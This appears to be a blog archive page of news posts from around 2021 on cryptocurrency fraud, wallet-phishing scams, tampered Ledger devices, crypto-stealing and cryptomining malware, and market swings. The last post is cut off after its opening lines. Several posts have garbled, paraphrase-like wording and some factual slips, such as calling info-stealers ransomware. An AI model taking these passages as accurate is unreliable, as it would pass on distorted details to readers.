Search This Blog

Showing posts with label Crypto Currency. Show all posts

Fraudsters are Mailing Modified Ledger Devices to Steal Cryptocurrency

 

Scammers are mailing fraudulent replacement devices to Ledger customers who were recently exposed in a data breach, which are being used to steal cryptocurrency wallets. 

With increased cryptocurrency values and the use of hardware wallets to secure crypto funds, Ledger has become a frequent target for scammers. After receiving what appears to be a Ledger Nano X device in the mail, a Ledger user published a devious fraud on Reddit. The gadget arrived in authentic-looking packaging with a sloppy letter claiming that it was sent to replace their existing device as their customer information had been leaked online on the RaidForum hacker community. 

"For this reason for security purposes, we have sent you a new device you must switch to a new device to stay safe. There is a manual inside your new box you can read that to learn how to set up your new device," state the fake letter from Ledger. 

"For this reason, we have changed our device structure. We now guarantee that this kinda breach will never happen again." 

Despite the fact that the letter contained numerous grammatical and spelling issues, the information for 272,853 persons who purchased a Ledger device was published on the RaidForums hacking site in December 2020. This provided a slightly convincing reason for the new device's arrival. 

A shrinkwrapped Ledger Nano X box was also included in the package, containing what appeared to be a genuine device. After becoming skeptical of the device, they opened it and posted photos of the printed circuit board on Reddit, which clearly indicated the modification of devices. 

Mike Grover, a security researcher, and offensive USB cable/implant expert informed BleepingComputer that the threat actors added a flash drive and hooked it to the USB port based on the photos. 

Grover told BleepingComputer in a conversation about the photographs, "This appears to be a simple flash drive slapped on to the Ledger with the purpose of being for some form of malware delivery." 

"All of the components are on the other side, so I can't confirm if it is JUST a storage device, but.... judging by the very novice soldering work, it's probably just an off-the-shelf mini flash drive removed from its casing." 

As per the image examining, Grover highlighted the flash drive implant connected to the wires while stating, "Those 4 wires piggyback the same connections for the USB port of the Ledger." 

According to the enclosed instructions, it instructs people to connect the Ledger to their computer, open the drive that appears, and execute the accompanying application. The person then enters their Ledger recovery phrase to import their wallet to the new device, according to the guidelines. 

A recovery phrase is a human-readable seed that is used to produce a wallet's private key. Anyone with this recovery phrase can import a wallet and gain access to the cryptocurrency contained within it. After entering the recovery phrase, it is sent to the attackers, who use it to import the victim's wallet on their own devices to steal the contained cryptocurrency funds. 

This fraud is acknowledged by Ledger and they issued warnings about it in May on their dedicated phishing website. 

Recovery phrases for Ledger devices should never be shared with anybody and should only be input directly on the Ledger device the user is trying to recover. The user should only use the Ledger Live application downloaded straight from Ledger.com if the device does not allow to enter the phrase directly. 

Ledger customers flooded with scams: 

In June 2020, an unauthorized person gained access to Ledger's e-commerce and marketing databases, resulting in a data breach. 

This information was "used to send order confirmations and promotional mailings — largely email addresses, but with a subset that also included contact and order details including first and last name, postal address, email address, and phone number." 

Ledger owners began getting several of the phishing emails directing them to fraudulent Ledger apps that would fool them into inputting their wallet's recovery codes. After the contact information for 270K Ledger owners was disclosed on the RaidForums hacker community in December, these scams became more common. 

The leak resulted in phishing operations posing as new Ledger data breach notifications, SMS phishing texts, and software upgrades on sites imitating Ledger.com.

Kubeflow: The Target of Cryptomining Attacks

 

Microsoft has discovered a new, widespread, ongoing threat that aims to infect Kubernetes clusters running Kubeflow instances with malicious TensorFlow pods that mine cryptocurrencies. Kubeflow is a popular open-source framework for conducting machine learning (ML) tasks in Kubernetes, while TensorFlow is an end-to-end, open-source ML platform. 

Microsoft security experts cautioned on Tuesday that they noticed a rise in TensorFlow pod deployments on Kubernetes clusters at the end of May — pods that were running legal TensorFlow images from the official Docker Hub account. However, a closer examination of the pods' entry point revealed that they are used to mine cryptocurrency. 

In a post on Tuesday, Yossi Weizman, a senior security research software engineer at Microsoft's Azure Security Center, said that the "burst" of malicious TensorFlow deployments was "simultaneous," implying that the attackers scanned the clusters first, kept a list of potential targets, and then fired on all of them at the same time. The attackers used two distinct images, according to Weizman. The first is the most recent version of TensorFlow (tensorflow/tensorflow:latest), and the second is the most recent version with GPU support (tensorflow/tensorflow:latest-gpu). 

According to Weizman, using TensorFlow images in the network "makes a lot of sense," because “if the images in the cluster are monitored, usage of a legitimate image can prevent attackers from being discovered.” Another rationale for the attackers' decision is that the TensorFlow image they chose is an easy way to conduct GPU activities using CUDA, which "allows the attacker to optimize the mining gains from the host," according to him. 

The newly found vulnerability is comparable to a cryptocurrency mining attack revealed by Microsoft in June. That previous campaign also targeted Kubeflow workloads, launching a broad XMRIG Monero-mining campaign by exploiting misconfigured dashboards. The most recent campaign includes the following changes: According to Weizman, the attackers abused their access to the Kubeflow centralized dashboard to establish a new pipeline this time.

Kubeflow Pipelines is a framework for creating machine learning pipelines based on Argo Workflow, an open-source, container-native workflow engine for coordinating parallel jobs. A pipeline is a collection of steps, each of which functions as its own container, that together creates an ML workflow. 

Users of Kubeflow should ensure that the centralized dashboard is not insecurely exposed to the internet, according to Microsoft.

Cryptocurrency Addiction: Here's All You Need to Know!

 

Cryptocurrency addiction is defined as compulsive cryptocurrency trading and related behaviors that have negative implications in a person's life. Cryptocurrency addiction is a behavioral addiction that disrupts or destroys personal, familial, and leisure endeavors, similar to gambling addiction. 

Many of us enjoy the occasional wager or lottery flutter – but it only becomes a problem for roughly 9 people out of 1000. However, 70 persons out of 1000 engage in dangerous behavior that could become an issue in the future. 

Cryptocurrency traders, according to experts, exhibit the same behavioral addictions as problem gamblers. Although no data exist for the number of people addicted to cryptocurrency trading, Tony Marini, the lead counselor at Castle Craig Hospital in Peebles, said they are seeing an increasing number of people in Scotland. 

"This is the crack cocaine of gambling because it is so fast," he said. "It's 24/7. It's on your phone, your laptop, it's in your bedroom." In the last few years, the clinic has treated over 100 people with cryptocurrency addictions. People come to his door because of his constant availability and severe volatility, told Mr. Marini. 

"There are so many people out there that are trading cryptocurrency that is making money," he said. "And they're telling everyone that they're making money. We are not hearing from the people that are losing money."

Jake was a cryptocurrency trader who lost millions of pounds. He does not want his true identity revealed since he is still receiving treatment at one of the UK's few hospitals dedicated to patients who are addicted to betting on the value of the virtual currency. Jake originally purchased Bitcoin, the most widely used cryptocurrency, in 2015, but it wasn't until a major win a few years later that his trading became out of control.

"I can pinpoint the exact moment it became a problem," he said. "I had been eroding the sum I put aside, but I entered a trade, and I was willing to risk that last amount I had. I ended up making back pretty much everything I lost in a single trade. The feeling was one of absolute euphoria."

The market isn't the only thing that may go wrong. The technology that powers cryptocurrency is notoriously difficult, and if you're not vigilant, you could end yourself investing in a hoax.

Ex-SEC Enforcer: Crypto Investors are Enabling Hackers

 

The founder of the Securities and Exchange Commission's internet enforcement bureau warned Thursday that investors in bitcoin and other digital currencies are helping online hackers. 

“Ransomware is hitting everywhere and they’re all collecting it in bitcoin because there’s no way they’re going to get caught. So you’re also enabling it,” John Reed Stark, now head of his own cybersecurity firm told in an interview to CNBC. 

Stark stated cryptocurrencies have almost no practical use, in contrast trading them to the speculation that previously boosted AMC Entertainment and other meme stocks like GameStop to great heights. Cryptocurrencies also require registration and other procedures that would improve the visibility of U.S. capital markets, he added. 

“At least with GameStop and AMC you’re not necessarily hurting anyone. ... But with crypto, you are really hurting a lot of people, and that sort of risk I don’t think is a good one for society,” Stark said. 

He also called crypto the essence of ransomware, a type of malicious software that can disrupt and even block computer networks. 

Brazil's JBS, the world's largest meatpacker, has resumed most production after a weekend ransomware attack, the latest in a line of hacks. JBS blames hackers to have links with Russia.

In May, Colonial Pipeline, the largest US fuel pipeline, paid ransomware demands last month after its operations were shut down for nearly a week. The FBI estimates the attack on Colonial Pipeline was carried out by DarkSide, which is a Russian-linked group that demanded $5 million to restore service. DarkSide eventually shut down after receiving $90 million cryptocurrency payments and last year, roughly $406 million in crypto payments were made to cyberattackers. 

“The country is kind of falling apart from ransomware all because of crypto, and the main reason people own crypto is because they think someone else will buy it and make the price higher,” said Stark, who spent 18 years at the SEC’s Enforcement Division. “There’s no other reason to invest in it,” he stated.

Who Could be Behind the Whale Address that Owns Dogecoin Worth $12 Billion?

 

After the sudden spike in cryptocurrency this year, news outlets and various traders have been thinking about who might be behind the famous and exceptional Dogecoin with the whale address DH5yaieqoZN36fDVciNyRueRGvGLR3mr7L, which is worth 12 billion dollars. It has mined 36.7 billion Dogecoins since 2019 and has a world demand of dogecoin of around 28%. 

Although it's fun to speculate that the aforementioned address belongs to a single person who suddenly accrued billions of dollars of the same meme cryptocurrency, Dogecoin. While Patrick Lodder, a dogecoin core creator, said that it more likely seems that the cryptocurrency address resembles some cryptocurrency exchange. 

Dogecoin is a crypto-monetary developed by Billy Markus and Jackson Palmer, software developers, who wanted to build a payment system like a prank, using wild speculation in cryptocurrencies at the time. Some regard this a valid investment opportunity, despite its humorous existence. 

Dogecoin's value has dropped significantly in recent days as China has imposed a ban on cryptocurrency trading, which is one of the primary reasons for the drop. Tesla and SpaceX's CEO Elon Musk, who mostly supports it on his social media pages, was primarily responsible for the development of the spike. 

While it’s no doubt that the story behind this meme cryptocurrency – Dogecoin must be the most interesting one but with the ongoing tweets from Elon Musk, his fans would connect the most to it. 

Lodder, who has worked with Dogecoin since 2014, has explained that everyone can deliver Doge to a publicly listed address so cash entering an address is no "clue" in the identification of the address unless its value increases significantly. 

"These are all jokers, that probably has nothing to do with the operator of the wallet, that's just people having fun," he said. 

CoinDesk's research head claimed that the inert activities could also state that the whale is not an exchange but simply a person. However, Lodder said that this form of operation implies that the address is cold storage for an exchange. An exchange that takes care of several Dogecoin probably will not keep it on the server and rather will discharge its assets into a more secure offline warehouse like a cold storage wallet. 

"This looks like somebody getting a lot of money into custody and putting that into a cold storage wallet so that it's more secure," Lodder told Business Insider. 

Many assumptions to whom the address may belong have indeed been published on various online forums. Similarly One of the Reddit accounts suspects this whale address could be one of the several dogecoin addresses of Robinhood. The user tracks data mostly on-chain and assumes that the address is one of the cold storage wallets of Robinhood. Whereas some believe that the address belongs to the father of dogecoin- Elon Musk. 

Such rumors', Lodder said, may theoretically be dangerous for a doge-like cryptocurrency. He added that there indeed is speculation that a whale might make people sell their doge in a hope that the whale would also dump all their doge. 

He said that if the address were part of an exchange, it would be helpful if the exchanges were to take place. Most cryptocurrency exchanges do not reveal their dogecoin or various other cryptographic addresses. 

"It would be helpful for the dogecoin community, not even just doge but all crypto, if there was a good way to either independently verify that the books of a custodial exchange are in order, or to have an audit report from a professional firm that does the audit and certifies that everything is fine," said Lodder.

DeFi100, a Crypto Project, Allegedly Scammed Investors of $32 Million

 

According to reports and tweets, DeFi100, a cryptocurrency project, allegedly defrauded investors out of $32 million (roughly Rs. 233 crores). The project has now released a denial of the allegations, but some skepticism appears to still exist. After a very distasteful message appeared on their website on Sunday, rumors of people behind the project fleeing with the money began to circulate. The message on the DeFi100 website read, "We scammed you guys, and you can't do **** about it." DeFi100 has since clarified that their website has been hacked and that the hackers had placed the post, which has since been removed.

“DeFi100 coin exit scams, and runs away with $32 million, and leaves a message for all of us. Feels like the summer of 2017,” tweeted Cryptokanoon, co-founder Kashif Raza. 

DeFi100 is a cryptocurrency similar to Bitcoin, Dogecoin, and Ethereum, among others. It is, however, much less well-known than the other well-known digital assets. The website was still down at the time of publishing. “Oops, looks like the page is lost. This is not a fault, just an accident that was not intentional,” is what it says now. 

On Sunday, the crypto project announced on its official Twitter account that it had not exited as previously thought. “Firstly, total supply of D100 at present is less than 4 million tokens. At the beginning of the project, total supply was 2.5 million tokens. Secondly, D100 was never a yield farming protocol, which was holding investors funds with TVL over 32 million,” it said in a tweet. 

“Thirdly, total tokens sold during IDO were 750,000 at $0.80 per token. These facts are available in public for checking their authenticity. The rumours of stealing $32 million are absolutely false and baseless," it added in the subsequent tweet. "We reiterate it again that we have not made any exit." 

Although the DeFi100 founders have stated that they did not defraud the investors, nothing can be said before the website is up and running again. The value of D100, DeFi100's native token, has dropped 25% in the last 24 hours to $0.08, according to a Coindesk article (roughly Rs. 6). 

The reports of DeFi100 developers defrauding their investors came just days after the FBI, the US's main law enforcement agency, announced that it had received a record 1 million complaints related to online scams and investment frauds in the previous 14 months.

The youngest crypto millionaire Mr. Buterin destroyed almost $7 billion worth of Shiba tokens donated to him

 Creator of Ethereum, crypto millionaire Vitalik Buterin destroyed more than 410 trillion Shiba tokens, the total value of which CoinDesk estimates at $6.7 billion. According to Etherscan, Buterin sent the coins to a non-existent address and thus removed them from circulation

In a note attached to the transaction, Buterin explained that he had decided to destroy 90% of the Shiba tokens he owned. The billionaire plans to send the rest of the funds to charity.

He has previously donated more than 50 trillion Shiba tokens (almost a billion dollars) to the fight against coronavirus in India.

Earlier, the creators of Shiba transferred half of all issued coins to the wallet of the founder of Ethereum to attract attention to their cryptocurrency. In his note, Buterin asked all the creators of cryptocurrencies to no longer send him tokens without his consent.

The mass destruction of tokens has not yet affected the Shiba token exchange rate. According to Coingecko, since the morning of May 17, the value of the cryptocurrency is kept at about 0.000016 dollars per token.

However, the commission has decreased. According to Bitinfocharts, the average transaction fee on the Ethereum network has decreased by 74% over the past five days.

Yuri Pripachkin, president of the Russian Association of Cryptocurrencies and Blockchain, added that any destruction of the mass of tokens leads to an increase in the price.

"This is a PR campaign to attract attention to Ethereum. This is a marketing move, Vitalik Buterin has the right to do so," Pripachkin said.

According to him, meme-cryptocurrencies will not have a serious future, and people who take everything that happens with meme tokens seriously "do not cause anything but a surprise."

It is worth noting that in early May, 27-year-old programmer Vitalik Buterin became the youngest cryptocurrency billionaire in the world. Buterin's wallet contains more than 333 thousand Ethereum tokens, the price of which has increased 25 times since the beginning of last year.

Buterin was born in Russia but moved to Canada with his parents at an early age.

Crypto Tumble is Testing the Durability of the Cryptocurrency Boom

 

The rapid and broad retreat of virtual currencies is putting the cryptocurrency boom to the test. After a bruising U.S. session that shocked the cryptocurrency world, Bitcoin and Ether remained under strain. 

During Asian trading, the two most common digital tokens retreated to this week's lows before recovering. As of 12:09 p.m. in Hong Kong, bitcoin had fallen as much as 8.7% and was trading at $39,270. Ether was down as much as 15% at one stage, but it later recovered. 

In the last week, the value of more than 7,000 tokens monitored by CoinGecko has dropped by more than $600 billion to $1.9 trillion. Bitcoin, the most popular cryptocurrency, fell 11% on Wednesday, breaking below $40,000 for the first time, and is now around $25,000 below its April high. 

Several factors are at stake, ranging from onetime promoter Elon Musk's criticism of Bitcoin's energy usage's environmental effects to the possibility of a regulatory crackdown on what has been dubbed the "Wild West of investing." The returns from digital tokens have been so large that some traders may have been taking money. 

According to Jeffrey Halley, senior market analyst at Oanda, the $40,000 mark is a "critical make-or-break pivot stage" for Bitcoin, and a drop to just below $30,000 isn't out of the question.

Early in April, the market capitalization of cryptocurrencies surpassed $2 trillion for the first time, more than doubling in less than two months on expectations that institutional investors will become more active. About $600 billion has been lost as a result of the existing weakness. According to Mike McGlone, a commodity strategist at Bloomberg Intelligence in New York, bitcoin checked its 200-day moving average, and its discount to the 120-day average is the largest since last year. He expects the price of Bitcoin to settle around the $49,000 average in 2021. 

Bitcoin's price to gold ratio has fallen to its lowest level since early February. This comes as investors become more cautious of risky assets, as well as the economy's post-pandemic recovery. Bitcoin supporters argue that it is a modern-day store of value, but the token's volatility contradicts this argument. 

A continuing recovery in Ether, the second-largest cryptocurrency, attracted attention after Bitcoin pulled back from a mid-April peak. But that, too, has come to a halt. In a note published on Monday, Chris Weston, head of research at Pepperstone Group Ltd. in Melbourne, said he was closing a short Bitcoin/long Ether trade because the "dust just needs to settle."

Trust Wallet & MetaMask Crypto Wallets: Targeted by New Support Scam

 

Users of Trust Wallet and MetaMask wallets are the targets of ongoing malicious Twitter phishing attacks aimed at stealing cryptocurrency funds. MetaMask and Trust Wallet are mobile apps that enable users to create wallets to store, buy, send, and receive cryptocurrency and NFTs. 

When users first open the MetaMask or Trust Wallet apps, they are prompted to create a new wallet. The app then displays a 12-word recovery phrase and encourages users to save it somewhere safe as part of this procedure. This recovery phrase is used by the apps to generate the private keys needed to enter the wallet. Anyone who knows the recovery phrase can import the wallet and access the cryptocurrency funds it contains. 

BleepingComputer has been monitoring a Twitter phishing scam that targets Trust Wallet and MetaMask users and steals cryptocurrency wallets by spreading fake technical support forms for the past two weeks. The phishing scam begins with authentic MetaMask or Trust Wallet users tweeting about a problem with their wallets. Theft of money, problems accessing their wallets, and problems using the apps are all examples of these problems. 

Scammers respond to these tweets by posing as members of the app's support team or users who claim that "Instant support" helped them with the same problem. Users are encouraged to fill out a support form by visiting the included docs.google.com or forms.app links. 

Users who click on these links will be taken to a page that looks like a help form for Trust Wallet or MetaMask. These forms ask for the visitor's email address, name, the problem they're having, and then the scam's crown jewel: the wallet's 12 recovery phrases. Threat actors may use a Trust Wallet or MetaMask user's recovery phrase to import the victim's wallet on their own devices and steal all of the deposited cryptocurrency funds.

Unfortunately, there is nothing that a user can do to recover funds after they have been stolen by a threat actor. Phishing scams involving cryptocurrency have previously been extremely popular, with one MetaMask user losing over $30,000 in cryptocurrency after sharing their recovery phrase. 

The Trust Wallet and MetMask users should never share their wallet's recovery phrase or type it into any app or website. Furthermore, for help requests, a legitimate organization would not use Google Docs or online form-building sites. Just seek assistance from the specific pages affiliated with the app or computer you're having trouble with. 

When it comes to cryptocurrencies and financial assets, the user should always type the URL they wish to visit into their browser rather than relying on links in emails, as it is simple to build lookalike domains that impersonate legitimate sites. This way, users can avoid mistakenly clicking on phishing sites that impersonate a legitimate service.

167 Fake iOS & Android Trading Apps Brought to Light by Researchers

 

Sophos, a worldwide leader in cybersecurity, has found 167 fake Android and iOS apps that criminals have been using to rob people who still believe they have a very well, trustworthy financial trading, banking, or cryptocurrency application. A research article titled, ‘Fake Android and iOS apps disguised as trading and cryptocurrency apps,’ illustrates how criminals utilized social technology, fake web pages like a fake iOS App Slot, and an iOS app tester to deliver the fake apps to unsuspecting customers. 

Fake applications were investigated and the results showed that all were very similar to each other, as stated by Sophos researchers. Many have included the "chat" option to integrate customer service. When researchers attempt to communicate by using chat with support teams, answers were almost alike. They also discovered a single server loaded with 167 counterfeit trading and cryptocurrency applications. In combination, this indicates that, according to Sophos, all fraud might be carried out by the same party. 

In one of the scenarios examined, the scammers approached the customers through a dating app by creating a profile and exchanging messages with specific objectives before attempting to encourage them to download and add money and cryptocurrency to a counterfeit application. The attackers blocked access when their targets later tried to withdraw funds or close the account. 

In other instances, websites built to resemble a reputable company, such as a bank, have been able to attract the targets. To persuade the users to install an app from the genuine App Store, they have even developed a fake "iOS App Store" download page with fabricated customer reviews. 

When the visitors pressed upon the links to install fake apps for Android or iOS, something like a smartphone web app was obtained but was only a shortcut icon connected to a fake website. 

Technicians have also delivered fake iOS applications via third-party websites to encourage developers towards testing new applications with a small number of Apple device users before applying to the official App Store. 

“People trust the brands and people they know – or think they know – and the operators behind these fake trading and cryptocurrency scams ruthlessly take advantage of that,” said Jagadeesh Chandraiah, a senior threat researcher at Sophos. “The fake applications we uncovered impersonate popular and trusted financial apps from all over the world, while the dating site sting begins with a friendly exchange of messages to build trust before the target is asked to install a fake app. Such tactics make the fraud seem very believable.”

“To avoid falling prey to such malicious apps, users should only install apps from trusted sources such as Google Play and Apple’s app store. Developers of popular apps often have a website, which directs users to the genuine app and, if they have the skills to do so, users should verify if the app they are about to install was created by its actual developer. Last, but not least, if something seems risky or too good to be true – high returns on investment or someone from a dating site asking you to transfer money or cryptocurrency assets into some ‘great’ account – then sadly it probably is,” he further added.

Sophos also recommends the user install an anti-virus program on the mobile device to defend Android and iOS devices from cyber attacks, like the Intercept X for Mobile.

$2 Million Cryptocurrency Controversy Linked with WallStreetBets Investors

 

As per a Bloomberg News story, at least $2 million of a cryptocurrency conspiracy was recently tossed from investors of Wall Street Bets, enticing them to invest in new crypto coins associated with the famous meme stake. 

Moderators of the infamous Reddit Forum have already warned users for weeks to stop fraud based on the good credibility of the WSB. An article published calls on members of the community to be aware of WSB items offers. 

“People keep posting a press release about an official Wall Street Bets distributed app. (Aka, a crypto pyramid scheme). Nothing could be further from the truth. We are strongly anti-monetization. This scam has nothing to do with us,” as per the report. 

Many people have skipped the memo, as a couple of WSB enthusiasts have recently been scammed by this ilk. In reality, lately, an offer has been made available on the chat app Telegram, ordered by a "Wall Street Bets — Crypto Pumps" account. These "Crypto Pumps" claimed that it offered bet enthusiasts the opportunity to invest in the latest crypto token known as "WSB Finance." In the domain of cryptocurrency, such an arrangement is called the "premise sale," which allows an early investor to purchase a token until the crypto exchange reaches as well as the public distribution is more widespread. 

Potential buyers were instructed to submit Binance Coin or Ether to a crypto wallet and then contact the "token bot" on the site that would transfer the tokens for the user WSB Finance. It's been not much until the ETH and BNB flowed into the wallet of Crypto Pump. 

Nevertheless, a little snack came from the buyers. " Pumps" alerted everyone that there was an issue with the bot soon after the coinage was pocketed, it was faulty. This will lead to even more users sending crypto payments, or “lose their initial investment,” reports Bloomberg. 

Innately, the "WSB Finance Tokens" are not present as well as the coins also never appeared. Whatever fraudsters they were, they made up to some 3,451 Binance coins – a total of some $2.1 million once converted into real-world currency. The suspects could also have rendered unspecified contributions by Ether donations. 

Before the “Crypto Pumps” profile disappeared from Telegram, the page’s administrator had one final message to share. The fraudster wanted victims to know how the ill-gotten winnings would be spent: “Buying Lambo now,” they said.

Panda Stealer Spreads Via Discord to Steal User Crypto-Currency

 

A new type of malware – Panda Stealer – is spreading through a spam campaign globally. Trend Micro researchers reported on Tuesday that they first encountered the latest stealer in April. In Australia, Germany, Japan, and the USA, the latest surge of the spam campaign seems to have the greatest effects. 

The spam emails hide and click booby-trapped Excel files as nothing more than a business quote application to attract victims. Researchers found 264 Panda Stealer-like files with Virus Total, some of which are exchanged by threat actors operating via Discord. 

Given recent developments, this isn’t shocking. The cybersecurity team in Cisco's Talos noticed recently that some threat actors are using workflow and communication resources such as Slack and Discord to sneak past safety and provide robbers, remote access trojans (RATs), and malware. Now again, the threatening actors may use Discord to share the Panda Stealer. 

If Panda becomes confident, it attempts to acquire information like private clues and past crypto-currency wallet activities such as Bytecoin (BCN), Dash (DASH), Ethereum (ETH), and Litecoin (LTC). It may also filter applications such as NordVPN, Telegram, Discord, and Steam in addition to stealing wallets. Panda could also take screenshots and swipe browser info, including cookies and passwords, through infected computers. 

The scientists found out two ways in which spam infects victims: An.XLSM attachment contains macros in one infection chain, which installs a loader that executes the criminal. An .XLS attachment including an Excel formula is also used in another infection chain to enable the instruction PowerShell to access paste.ee, a Pastebin alternative which in turn is secondary encryption for PowerShell command. 

"The CallByName export function in Visual Basic is used to call a load of a .NET assembly within memory from a paste.ee URL," Trend Micro says. "The loaded assembly, obfuscated with an Agile.NET obfuscator, hollows a legitimate MSBuild.exe process and replaces it with its payload: the hex-encoded Panda Stealer binary from another paste.ee URL." 

Panda Stealer is a modification to the DC Stealer malware Collector, that has been sold for as little as $12 on a hidden marketplace and via telegraph. It is announced as a "top-end information stealer" and also has a Russian connection. The Collector Stealer was broken by a threat actor, NCP, identified as su1c1de. The cracked stealer as well as the Panda Stealer act likewise but do not share the very same URLs, tags, or execution files. 

“Cybercriminal groups and script kiddies alike can use it to create their customized version of the stealer and C2 panel,” Trend Micro researchers said. “Threat actors may also augment their malware campaigns with specific features from Collector Stealer.” 

Trend Micro says that there are parallels to Phobos Ransomware in the attack chain. In particular, in its distribution method, the Phobos "Fair" version, as defined by Morphisec, is identical and is continuously being revised to cut down on its footprint, for example, to reduce encryption criteria, to remain underneath the radar as long as possible.

Hotbit Shut Down all Services After a Cyberattack

 

After an alleged cyberattack on Thursday, cryptocurrency trading site Hotbit has shut down all of its services. A note on the platform's website reads, “Hotbit just suffered a serious cyber-attack starting around 08:00 PM UTC, April 29, 2021, which led to the paralysation of a number of some basic services.”   

While the hackers were unable to obtain access to Hotbit's wallets, they were able to penetrate the platform's user database. Customers should ignore all contact from people pretending to be members of the exchange, according to the Hotbit team. Hotbit has reported that pending trading orders are cancelled to avoid damages when all regular activities are suspended during the ongoing maintenance. During the upkeep, the exchange also agreed to cover all damages incurred by exchange-traded funds listed on its website.

Before restoring servers and facilities, the exchange is looking for any evidence of computer tampering that may have contaminated any of the frequently backed up data. Due to the time required to review backup data before beginning the system restoration process, customers were advised that the investigation and recovery process could take anything from 7 to 14 days. 

The attackers have obtained access to plain text customer information (phone number, email address, and asset data) contained in Hotbit's servers, according to the company. Despite the fact that customers' passwords and 2FA keys were secured, the exchange advised consumers to update their passwords on all other web sites where they used the same credentials. 

Alex Zhou, Hotbit's chief security officer, told users on the exchange's Telegram group that customer funds were unaffected by the attack, saying: “The attacker tried to break into the wallet server to steal funds but the action was identified and blocked successfully by Hotbit risk control system. All users’ funds are safe. At the same time, Hotbit is in the process of transferring all funds in hot wallet to cold wallet, the details of the whole integration could be seen on the chain,” he said. 

Multiple token outflows from one of Hotbit's established wallets to another address that currently holds around $14 million in many altcoins, according to data from Ethereum transaction tracking platform Etherscan.

According to comments on social media and in the platform's Telegram forum, the length of time provided for the maintenance is causing considerable unrest among Hotbit users.

Fake Microsoft DirectX 12 Distributes Malware

 

Cybercriminals have built a bogus Microsoft DirectX 12 download page in order to spread ransomware that steals cryptocurrency wallets and passwords. Despite the fact that the website has a contact form, a privacy policy, a disclaimer, and a DMCA infringement page, the website and the services it distributes are not valid.

Users will be routed to an external website when they press the Download buttons, which will prompt them to download a file. You'll be sent a file called '6080b4 DirectX-12-Down.zip' [VirusTotal] or '6083040a Disclaimer.zip' [VirusTotal] depending on whether you want the 32-bit or 64-bit edition. All of these files contribute to malware that attempts to steal files, passwords, and cryptocurrency wallets from their victims.

When the bogus DirectX 12 installers are launched, they silently download and execute malware from a remote site, as discovered by security researcher Oliver Hough. This malware is a data-stealing Trojan that tries to snatch a victim's cookies, directories, device records, installed programs, and even a snapshot of the current desktop. The malware authors are attempting to steal a number of cryptocurrency wallets for Windows applications, including Ledge er Live, Waves.Exchange, Coinomi, Electrum, Electron Cash, BTCP Electrum, Jaxx, Exodus, MultiBit HD, Aomtic, and Monero. 

All of the information is gathered in a %Temp% folder, which the malware will zip up and give back to the attacker. The data will then be analysed and used for other nefarious purposes by the attack. To spread malware, threat actors are rapidly building fake websites, some of which are much more persuasive than others.

Ficker ransomware is already spreading across websites impersonating Microsoft Store and Spotify, according to ESET. Details and user accounts stored in web browsers, email applications, and FTP clients are stolen by the malware. It can even rob from your bitcoin wallet, exfiltrate documents, and take screenshots of your running applications. 

As part of a larger ransomware campaign targeting cybersecurity experts, the Lazarus Group has set up a bogus protection firm and social media accounts. For a fictitious Turkish business called SecuriElite, the attackers built a website, as well as a Twitter and LinkedIn account. When the Google security team was focusing on tracking down the state-backed hackers, the firm was allegedly providing offensive security services.

Bitcoin Sinks Below the $50,000 Mark

 

Bitcoin and other cryptocurrencies lost a lot of money on Friday when investors worried that US President Joe Biden's decision to lift capital gains taxes will discourage them from investing in digital assets. The selloff followed news that the Biden administration was considering a raft of tax reform proposals, including a measure to almost increase capital gains rates to 39.6% on those making more than $1 million.  

Bitcoin, the world's largest and most successful cryptocurrency, dropped 7% to $48,176, slipping below $50,000 for the first time since early March, while smaller rivals Ether and XRP both fell about 10%. Markets were jolted by the tax plans, forcing investors to book gains in stocks and other risk assets, which had soared in anticipation of a strong economic rebound. Investment gains levy rates are expected to rise to new highs. 

"Bitcoin headed South today after President Biden signalled that he wanted to raise capital gains tax in the US," said Jeffrey Halley, senior market analyst, Asia Pacific, at OANDA. "Now whether that happens or not, many Bitcoin investors are probably sitting on some substantial capital gains if they stayed the course over the past year." 
"I firmly believe that developed market regulation and/or taxation remain the crypto markets' Achilles Heel," he added. 

Bitcoin is set to lose 15% this week, but it is still up 65 percent from the beginning of the year. Ether fell more than 10% on the day to as low as $2,107 (roughly Rs. 1.5 lakhs), despite climbing to a new high of $2,645.97 the day before (roughly Rs. 2 lakhs). 

"I don't think Biden's taxes plans will have a big impact on Bitcoin," said Ruud Feltkamp, CEO at automated crypto trading bot Cryptohopper. "Bitcoin has only gone up for a long time, it is only natural to see a consolidation. Traders are simply cashing in on winnings." 

"There are reasons to believe the overall trend will remain bullish unless the price drops below $40k," said Ulrik Lykke, executive director at crypto hedge fund ARK36. "At the moment, we are not convinced that the trend will reverse into a bear market but we acknowledge it may take some time before the demand overtakes the supply again in the medium to short term."

Cryptojacking Spree: Targeting Washington State Educational Institutions

 

According to a new advisory released by Palo Alto Network's Unit 42 team, recently, cryptojacking incidents have taken place against educational institutions in Washington State. Threat actors are targeting educational institutions in the United States intending to compromise their networks and mine cryptocurrency covertly. 

Otherwise known as cryptojacking attacks, this is a form of cyberattack in which attackers use deception tactics to install cryptocurrency mining components that leech off of computational power without being noticed or detected. 

On February 16, cybersecurity researchers discovered the first attack, which consisted of a malicious HTTP request sent to a domain owned by an educational institution. Security teams initially mistook it for a trivial command injection flaw, but it turned out to be a command for a web shell backdoor that attackers used to gain access to the institution's network. 

In this form of attack, attackers use various types of miner software to try to generate cryptocurrencies such as Monero, Litecoin, Bitcoin, and Ethereum. Attackers typically compromise a large number of systems to make the attacks lucrative and bring in more cryptocurrency. 

The researchers say that a UPX-packed cpuminer -- used to mine LTC and BTC -- has been delivered by way of malicious traffic. 

If deployment is successful, the backdoor is then able to call and execute the crypto mining payload. Besides, the malware will download a mini shell that pretends to be a wp-load.php file. "Since the mini shell is not moved elsewhere, we speculate that the current directory of the mini shell, as well as the backdoor, is a web directory exposed to the internet," the report states. 

Cryptocurrency mined on infected systems is sent to two wallets owned by the operators (1,2). In two other incidents, there were some differences when it came to user agent strings, pass values, and algorithms, but the general attack method remained the same. 

"The malicious request [...] exhibits several similarities," Unit 42 noted. "It's the same attack pattern delivering the same cpuminer payload against the same industry (education), suggesting it's likely the same perpetrator behind the cryptojacking operation."

An analysis of K-12 schools across the United States revealed in March that 2020 is a "record-breaking" year for cybersecurity incidents. Over 400 incidents were reported in the study, including ransomware, phishing attempts, website defacement, and denial-of-service (DoS) attacks.

Crypto at Risk After Facebook Leak: Here’s how Hackers Can Exploit Data

 

The tech giant Facebook has been hit with a new wave of data leaks, yet again but this time, the number of users whose records were exposed was not 50 million but a massive 500 million. 

